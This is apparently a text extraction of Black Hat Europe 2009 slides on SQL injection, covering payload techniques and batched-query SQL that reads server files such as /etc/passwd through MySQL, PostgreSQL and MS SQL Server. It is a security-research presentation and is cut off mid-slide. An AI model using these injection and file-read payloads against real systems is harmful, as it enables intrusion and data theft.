Sql injection
Bernardo Damele Assumpção Guimarães
Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009
Who I am
Bernardo Damele Assumpção Guimarães: • • • • Proud father IT security engineer sqlmap lead developer MySQL UDF repository developer
2
SQL injection definition
• SQL injection attacks are a type of injection attack, inwhich SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements • It is a common threat in web applications that lack of proper sanitization on usersupplied input used in SQL queries
3
SQL injection techniques
• Boolean based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--
• UNION query (inband) SQLinjection:
par=1 UNION ALL SELECT query--
• Batched queries SQL injection:
par=1; SQL query;-4
How far can an attacker go by exploiting a SQL injection?
5
Scope of the analysis
• Three database software:
– MySQL on Windows – PostgreSQL on Windows and Linux – Microsoft SQL Server on Windows
• Three web application languages:
– ASP on Microsoft IIS, Windows – ASP.NET on MicrosoftIIS, Windows – PHP on Apache and Microsoft IIS
6
Batched queries
• In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database • Example: SELECT col FROM table1 WHERE id=1; DROP table2;
7
Batched queries support
Programming languages and their DBMS connectors default support for batched queries
8
File system read access
9
Fileread access on MySQL
• LOAD_FILE() function can be used to read either a text or a binary file • Session user must have these privileges:
– FILE – CREATE TABLE for the support table
10
File read access on MySQL
Via batched queries SQL injection technique:
SELECT HEX(LOAD_FILE('C:/example.exe')) INTO DUMPFILE 'C:/WINDOWS/Temp/hexkflwl'; CREATE TABLE footable(data longtext); LOAD DATAINFILE 'C:/WINDOWS/Temp/hexkflwl' INTO TABLE footable FIELDS TERMINATED BY 'MFsIgeUPsa' (data);
11
File read access on MySQL
Via any SQL injection enumeration technique:
• Retrieve the length of the support table's field value • Dump the support table's field value in chunks of 1024 characters
On the attacker box:
• Assemble the chunks into a single string • Decode it from hex and write ona local file
12
File read access on PostgreSQL
• COPY statement can be used to read a text file
– User-defined function can be used to read a binary file
• Session user must be a super user to call this statement
13
File read access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data bytea); COPY footable(data) FROM '/etc/passwd';
14
Fileread access on PostgreSQL
Via any SQL injection enumeration technique:
• Count the number of entries in the support table • Dump the support table's field entries base64 encoded via ENCODE() function
On the attacker box:
• Assemble the entries into a single string • Decode it from base64 and write on a local file
15
File read access on MS SQL Server
• BULK INSERT statement can beabused to read either a text or a binary file and save its content on a table text field • Session user must have these privileges:
– INSERT – ADMINISTER BULK OPERATIONS – CREATE TABLE
16
File read access on MS SQL Server
Via batched queries SQL injection technique:
CREATE TABLE footable(data text); CREATE TABLE footablehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096)); BULK INSERTfootable FROM 'C:/example.exe' WITH (CODEPAGE='RAW', FIELDTERMINATOR='QLKvIDMIjD', ROWTERMINATOR='dqIgILsFoi');
17
File read access on MS SQL Server
[…] WHILE (@counter > filepath')
• Session user must have CONTROL SERVER privilege • On the attacker box:
– Split the file in chunks of 64Kb – Convert each chunk to its plain text debug script format
27
File write access on MS SQL...
Regístrate para leer el documento completo.